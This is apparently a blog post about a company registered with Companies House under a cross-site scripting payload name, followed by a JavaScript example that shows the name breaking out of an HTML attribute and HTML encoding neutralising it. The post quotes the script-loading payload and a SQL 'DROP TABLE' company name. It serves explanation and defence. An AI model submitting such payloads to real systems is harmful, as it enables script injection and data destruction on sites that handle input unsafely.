The return of Bobby Tables, LLC
He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]
He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.
A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."
I love that they called it a "chevron".
Chevron 1 was, apparently, not encoded.
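The break-out described in the quoted article, as an added example that is not from the original post or from Companies House: the name is echoed into a quoted `value` attribute, once raw and once HTML-encoded, and a small tag scanner shows what a browser would see. The `<input>` template, `escapeHtml`, `renderUnsafe`, `renderSafe` and `scanTags` are all hypothetical names; the article does not say which page context was affected.

```javascript
// Constructed sample: the company name as quoted in the article above.
const COMPANY_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD';

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical templates: a page that echoes the name into an attribute.
function renderUnsafe(name) {
  return '<input name="company" value="' + name + '">';
}
function renderSafe(name) {
  return '<input name="company" value="' + escapeHtml(name) + '">';
}

// Minimal tag scanner (not a full HTML parser): walks the markup, honouring
// quoted attribute values, and returns each tag name with its value attribute.
function scanTags(html) {
  const tags = [];
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    let j = i + 1, quote = null;
    while (j < html.length && (quote || html[j] !== '>')) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      j++;
    }
    const body = html.slice(i + 1, j);
    const tagName = (body.match(/^[A-Za-z][A-Za-z0-9]*/) || [''])[0].toLowerCase();
    const value = (body.match(/\bvalue="([^"]*)"/i) || [null, null])[1];
    tags.push({ tagName, value });
    i = j + 1;
  }
  return tags;
}

// Raw: an <input> with a blank value, followed by a <script> tag.
console.log(scanTags(renderUnsafe(COMPANY_NAME)));
// Encoded: a single <input> whose value carries the whole name as inert text.
console.log(scanTags(renderSafe(COMPANY_NAME)));
```

The characters can stay legal in a company name as long as every consumer of the data encodes them for the context it writes them into.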